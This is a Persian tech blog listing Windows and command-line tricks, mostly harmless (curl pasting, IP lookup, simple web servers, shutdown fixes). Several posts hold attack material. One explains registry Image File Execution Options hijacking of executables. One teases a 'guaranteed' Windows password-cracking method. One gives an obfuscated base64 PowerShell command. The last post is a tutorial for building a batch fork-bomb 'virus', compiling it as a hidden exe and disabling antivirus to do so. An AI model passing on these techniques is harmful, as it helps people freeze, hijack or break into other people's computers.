کرم های کامپیوتر





قالب وبلاگ در حال ویرایش شدن!

ممکن است اشکالاتی در قالب پیش بیاید
بنابراین پیشاپیش متاسفیم!

کرم های کامپیوتر

من و دوستم دو تا کرمیم که داریم تو سیستم ها وُل می خوریم و بعضی وقت ها براتون چیزایی که تو این وُل خوردن ها یاد گرفتیم رو می نویسیم!!!!!

تبلیغات

لاگ بندرعباس راه افتاد!

برای اطلاعات بیشتر به وبلاگ لاگ مراجعه کنید.
نویسنده وبلاگ ما شوید

شما می توانید در قالب نویسنده در کنار ما باشید و در این وبلاگ فعالیت کنید

ربات تلگرامی ما
نویسندگان
آخرین نظرات
  • ۱۴ تیر ۹۸، ۱۵:۴۶ - فرهاد حسن پور
    ali boood.

۱۱ مطلب با موضوع «ویندوز :: ترفند» ثبت شده است

Image hijack

۱۵
تیر

این اتفاق یعنی Image hijacking در ویندوز زمانی رخ می دهد که کاربر یا یک بدافزار در رجیستری به آدرس زیر تغییراتی به وجود بیاورد.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

اگر آدرس بالا کلیدی با نام برنامه مورد نظر مانند taskmgr.exe ساخته شود و در آن مقداری از نوع رشته با نام Debugger ایجاد کنید می توانید در آن آدرس یک برنامه را بنویسید تا با برنامه اصلی جاییگزین شود و به جای آن اجرا شود و یا با خالی گذاشتن این مقدار مانع از اجرا شدن آن شوید. (در این مثال می توانید تر اجرا شدن برنامه Task manager تغییرات ایجاد کنید.)

توجه داشته باشید که این عمل برای هر فایل اجرایی قابل انجام است و حتی می تواند سبب اجرا نشدن نرم افزار های حیاتی ویندوز و ایجاد خطا شود؛ پس مراقب باشید. این شما هستید که می توانید از آن استفاده خوب یا بد بکنید!

  • BSimjoo

در حال نوشتن چند خط کد بودم و نیاز داشتم که هربار کد را در یک کانال آی‌آر‌سی بفرستم تا کد بازبینی و اشتباهاتم گوشزد شود. از یک پیست‌بین(pastebin) استفاده میکردم و هربار پیوند نسخه جدید کد را به کانال میفرستادم اما این پروسه دردناک و آزار دهنده بود:

  • تغییر کد
  • کپی آن به بریده‌دان(clipboard) سیستم پنجره‌ی اکس
  • وارد شدن به apaste.info با مرورگر وب
  • وارد کردن کد و گرفتن پیوند کد
  • فرستادن کد به کانال
برای همین رفتم دنبال اینکه این فرآیند را کوتاه‌تر و خوش‌آیندتر کنم. برای اینکار از curl استفاده کردم. با اینکه کرل برای اکثر سیستم‌عامل‌ها از جمله داس، ویندوز، مک، شبه‌یونیکس‌ها و ... وجود دارد اما همچین چیزی بیشتر بدرد کاربرانی میخورد که با خط فرمان زیاد کار میکنند و این کاربران در ویندوز بدلیل عدم وجود یک خط فرمان قوی، کمتر دیده میشوند.
  • فاروق کریمی زاده

همونطور که می دونید ویندوز اجازه ساخت یک پوشه (یا Directory) با نام فاصله (white space) رو نمیده ولی میشه این کار رو با خط فرمان انجام داد. کد های زیر رو حتما امتحان کنید (به جای X هر حرفی می تواند باشد):

md "X:\ \"

و سپس

md "X:\ \test"

این دو کد در خط فرمان باعث ایجاد یک پوشه به اسم فاصله می شود. حالا برید و ببینید ویندوز چه باگهایی سر این پوشه می ده. اول که  پوشه رو باز می کنید چون کارکتر فاصله در آخر آدرس هست مرورگر فایل ویندوز (Windows Explorer) دچار یک اشتباه لپی شده و فاصله را در نظر نمی گیرد. پس به جای نشان دادن محتویات این پوشه که پوشه ای دیگر به نام test است، محتویات X:\ می دهد و اگر یک بار دیگر  روی این پوشه با نام فاصله کلیک کنید پیغام هشداری می بینید که می گوید نمی تواند آدرس X:\ \ \ را پیدا کند. تنها راه دسترسی به پوشه test تایپ آدرس آن (X:\ \test) در نوار آدرس است.

توجه: برای پاک کردن پوشه حتما از خط فرمان و دستور rmdir /s "X:\ \" استفاده کنید در غیر این صورت امکان دارد کل فایل ها پاک شوند.

  • BSimjoo
اگر بخواهید مکان فیزیکی یک IP را پیدا کنید، ابزار های آنلاینی برای اینکار وجود دارند اما شاید مثل من پیرو راه بزرگ یونیکس باشید و  خط‌فرمان سریغ‌تر و کم‌هزینه‌تر هم هست.
اینجا دو روش را معرفی میکنم که از طریق خط‌فرمان بتوانید مکان جغرافیایی یک IP را پیدا کنید. روش اول از یک برنامه استفاده میکند که بر اساس یک پایگاه داده و بصورت آفلاین کار میکند و برای شبه یونیکس‌ها شامل گنو/لینوکس،بی‌اس‌دی ها و ... در دسترس هست. روش دوم که از curl و یک API استفاده میکند، نیازمند دسترسی به اینترنت هست و روی اکثر سیستم‌عامل ها قابل استفاده در دسترس هست.
  • فاروق کریمی زاده

با این ترفند ساده و از طریق خط فرمان میتوانید فایل های حجیم را بسیار ساده و ظرف زمانی بسیار کمتر حذف کنید.خط فرمان را باز کرده و با توجه به سیستم‌عامل خود یکی از این دستورات را بزنید:

ویندوز/داس/امثالهم:

echo > filename
del filename
یونیکس و شبه یونیکس(شامل گنو،لینوکس،بی‌اس‌دی ها،مک و ...):
> filename
rm filename
  • فاروق کریمی زاده

همون طور که قبلا هم گفته بودم حداقل سیستم من با آبدیت های ویندوز 10 یکم مشکل داشت که یکی از اون ها خاموش نشدن سیستمم با استفاده از دکمه ی (shutdown) و یا استفاده از دستور shutdown /p بود. با کمی جست و جو در اینترنت فهمیدم بعضی ها هم همین مشکل رو داشتند.

در این مدت که برای خاموش کردن (shutdown) ویندوز نیاز به اعمال زور و فشار و گرفتن دکمه ی پاور و استفاده از (emergency shutdown) داشتم. هیچ به فکر این نبودم که یکبار دیگه از دستور برای خواموش کردن سیستم استفاده کنم. تا این که بالاخره متوجه شدم که با استفاده از دستور shutdown /s به جایshutdown /p می تونم سیستمم رو به سادگی البته بعد از چند ثانیه انتظار خاموش کنم.laugh

  • BSimjoo

چند وقتی بود که این مخزن رو توی گیت‌هاب به لیست علاقه‌مندی ها اضافه کرده بودم، این دستورات برای راه اندازی یک وب سرور ساده‌ی HTTP برای محتویات ایستا هستند(یعنی CGI و PHP و اینا پر!). این سرور ها همه به پورت ۸۰۰۰ گوش میدهند.

  • پایتون ۳
python3 -m http.server 8000
  • پایتون ۲
python -m SimpleHTTPServer 8000
  • روبی
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'
  • روبی ۱.۹.۲ و بالاتر
ruby -run -ehttpd . -p8000
  • پی اچ پی
php -S 127.0.0.1:8000
  • بیزی‌باکس
busybox httpd -p 8000
  • پاورشل
$Hso=New-Object Net.HttpListener;$Hso.Prefixes.Add("http://+:8000/");$Hso.Start();While ($Hso.IsListening){$HC=$Hso.GetContext();$HRes=$HC.Response;$HRes.Headers.Add("Content-Type","text/plain");$Buf=[Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)));$HRes.ContentLength64=$Buf.Length;$HRes.OutputStream.Write($Buf,0,$Buf.Length);$HRes.Close()};$Hso.Stop()

یا اگر خواستید با Command Prompt اجراش بکنید:

PowerShell.exe -nop -enc JABIAHMAbwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAEgAdAB0AHAATABpAHMAdABlAG4AZQByADsAJABIAHMAbwAuAFAAcgBlAGYAaQB4AGUAcwAuAEEAZABkACgAIgBoAHQAdABwADoALwAvACsAOgA4ADAAMAAwAC8AIgApADsAJABIAHMAbwAuAFMAdABhAHIAdAAoACkAOwBXAGgAaQBsAGUAIAAoACQASABzAG8ALgBJAHMATABpAHMAdABlAG4AaQBuAGcAKQB7ACQASABDAD0AJABIAHMAbwAuAEcAZQB0AEMAbwBuAHQAZQB4AHQAKAApADsAJABIAFIAZQBzAD0AJABIAEMALgBSAGUAcwBwAG8AbgBzAGUAOwAkAEgAUgBlAHMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIALAAiAHQAZQB4AHQALwBwAGwAYQBpAG4AIgApADsAJABCAHUAZgA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAKABHAEMAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAJABQAHcAZAAgACgAJABIAEMALgBSAGUAcQB1AGUAcwB0ACkALgBSAGEAdwBVAHIAbAApACkAKQA7ACQASABSAGUAcwAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgANgA0AD0AJABCAHUAZgAuAEwAZQBuAGcAdABoADsAJABIAFIAZQBzAC4ATwB1AHQAcAB1AHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAEIAdQBmACwAMAAsACQAQgB1AGYALgBMAGUAbgBnAHQAaAApADsAJABIAFIAZQBzAC4AQwBsAG8AcwBlACgAKQB9ADsAJABIAHMAbwAuAFMAdABvAHAAKAApAA==
  • شل
while true ; do nc -l 8000 < test.html ; done

نسخه پاورشل را خودم امتحان نکرده ام.

منبع و همچنین دستورات بیشتر برای اجرای وب سرور در گیت‌هاب گیست

  • فاروق کریمی زاده

شاید تا به حال با این مشکل مواجه شده باشید که برنامه یا بازی های مختلف نیاز به دات نت فیرم ورک (net framwork.) های مختلف داشته باضشد ولی نتوانید آن ها را روی ویندوز نصب کنید. در ویندوز 10 زمانی که فایل نصب فریم ورک را اجرا می کنید صفحه ای برای دانلود آن می آید که بسیار زمان بر است و در آخر هم با شکست مواجه می شوید. برای نصب فریم ورک کافیست از سی دی یا ایزو (iso) یا فلشی که ویندوز روش هست استفاده کنید.

  • BSimjoo

با این روش شما می توانید هر چند فایلی را که می خواهید به عکس ضمیمه کنید و عکس آسیب نبیند و بدون نیاز به همراه داشتن فایل اضافه تری از خود عکس فایل ها را دوباره استخراج کنید. علاوه بر این ها می توانید در این روش از فایل های خود محافظت نیز بکنید.

  • BSimjoo

این راه 100% تضمینی و عملی است و خودم چندین بار روی ویندوز های مختلف امتحان کرده ام و جواب داده است. برای شکستن پسورد ویندوز از طریق این راه نیاز به هیچ ابزار یا نرم افزار اضافه ای ندارید.( هر چند اگر داشته باشید کارتان سریع تر پیش میرود)

  • BSimjoo

برای این کار شما نیاز به استفاده از برنامه (Quick Batch File Compiler) دارید.

علاوه بر آن باید چند کد آزاردهنده‌ی (cmd) را بلد باشید.

به طور مثال:

echo off
cls
:progstart
start /max
goto progstart

این دستورات باعث می شود تا بی نهایت صفحه (cmd) باز شود (بسته به سرعت سیستم تقریبا هر ثانیه 5 صفحه باز می شود) و باعث فریز شدن ویندوز می شود به طوری که حتی موس هم به سختی حرکت می‌کند.هیچ آنتی ویروسی نمی تواند این بدافزار را پیدا کند و آن را از بین ببرد.

  • این کد ها را در یک فایل با فرمت بچ (bat.) نوشته و توسط برنامه (Quick Batch file compiler) بازکنید.
  • در بخش گزینه ها (option) گزینه‌ی (ghost application) را علامت دار کنید.
  • اگر آنتی ویروس دارید آن را فقط برای مرحله ی کامپایل غیر فعال کنید.
  • با استفاده از گزینه (build) یک فایل قابل اجرا با فرمت (exe.) بسازید.

حالا اگر دوست دارید تمام برنامه ها و کار های نیمه کاره را انجام بدید و ویروسی را که ساختید امتحان کنید! خیالتون راحت فقط مجبور خواهید شد سیستمتون رو ریستارت کنید!

  • BSimjoo